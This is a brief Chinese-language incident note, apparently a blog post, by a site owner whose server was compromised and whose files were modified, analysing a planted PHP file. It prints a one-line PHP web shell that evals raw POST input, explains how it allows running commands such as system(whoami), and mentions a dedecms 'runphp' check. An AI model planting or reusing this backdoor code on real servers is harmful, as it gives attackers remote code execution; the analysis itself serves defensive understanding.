8月30日被搞了,网站文件被修改,然后发现一个php文件<
eval(file_get_contents($file)) 本地包含
比如:
<?php
@eval(file_get_contents('php://input'))
?>
接收post数据,可以构造system(whoami),直接执行代码,这里他只不过是远程执行了一个exec.php。
$_SERVER['SERVER_NAME'] 获取主机名
['runphp']="yes" dedecms里运行php的一个判断
总结一下就是z数组的第四个index值=yes的时候,就执行var_dump($z)